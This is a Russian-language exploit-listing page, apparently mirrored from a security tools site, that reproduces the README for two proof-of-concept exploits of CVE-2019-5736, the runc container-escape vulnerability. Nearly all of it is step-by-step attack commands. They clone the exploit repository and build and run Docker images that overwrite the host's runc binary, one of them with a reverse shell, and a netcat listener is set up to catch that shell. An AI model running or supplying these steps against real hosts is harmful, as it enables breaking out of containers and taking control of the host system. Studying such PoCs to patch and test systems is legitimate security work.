## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TWISTLOCK-RUNC-CVE-2019-5736
# RunC-CVE-2019-5736
Два PoC для CVE-2019-5736. См. Twistlock Labs с объяснением CVE-2019-5736 и PoC.
PoC вредоносного образа во многом основан на PoC от q3k, так что вся заслуга принадлежит ему.
## Запуск PoC
Обратите внимание, что запуск PoC перезапишет бинарный файл `runc` на хосте. Рекомендуется создать копию вашего бинарного файла `runc` (обычно находится в `/usr/sbin/runc`) перед запуском одного из PoC.
Клонируйте репозиторий:
root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
### Exec PoC
Перезаписывает `runc` простой программой, которая выводит строку.
Запуск exec PoC:
root@kitploit:~
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
### PoC вредоносного образа
Перезаписывает runc простым bash-скриптом обратной оболочки, который подключается к localhost:2345.
Прослушивайте порт для обратной оболочки:
root@kitploit:~
$ nc -nvlp 2345
Из другого терминала запустите PoC вредоносного образа:
root@kitploit:~
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC